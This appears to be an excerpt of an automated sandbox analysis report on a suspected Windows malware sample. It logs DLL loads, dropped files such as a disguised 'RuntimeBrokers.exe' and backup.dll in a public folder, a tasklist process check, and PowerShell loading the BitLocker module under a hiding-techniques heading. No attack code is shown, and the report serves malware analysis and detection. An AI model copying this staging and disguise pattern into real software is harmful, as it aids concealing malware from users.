Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: flashcenter_pp_ax_install_cn.exe.lnk.4.drLNK file: ..\..\Public\Bilite\flashcenter_pp_ax_install_cn.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: CnjMEmbChO.exeStatic file information: File size 23595283 > 1048576
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb< source: powershell.exe, 0000000F.00000002.85573201377.000000000715F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85572145117.00000000070CF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.85578617480.000000000848E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb, source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000003.85441500637.00000000013ED000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85573201377.000000000715F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-3778222414-1001_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000000F.00000002.85572145117.00000000070E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbv source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, RuntimeBrokers.exe, 00000004.00000000.84738994152.00000000000FF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.85577677718.00000000083A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000F.00000002.85578337890.0000000008466000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\workspace\GTChecker\plutus\main\dev\target\win\Release\GTCheck.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb| source: powershell.exe, 0000000F.00000002.85554798220.0000000002906000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\ymishra\Documents\GitHub\Dev\target\win\Release\Adobe Download Manager.pdb source: CnjMEmbChO.exe, 00000000.00000003.84733438844.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: libcurl.dll.0.drStatic PE information: section name: .00cfg
Source: backup.dll.4.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_050742E2 push ebx; ret 14_2_050742EA
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile created: C:\Users\Public\Bilite\flashcenter_pp_ax_install_cn.exeJump to dropped file
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\CnjMEmbChO.exeFile created: C:\Users\Public\Bilite\Axialis\libcurl.dllJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
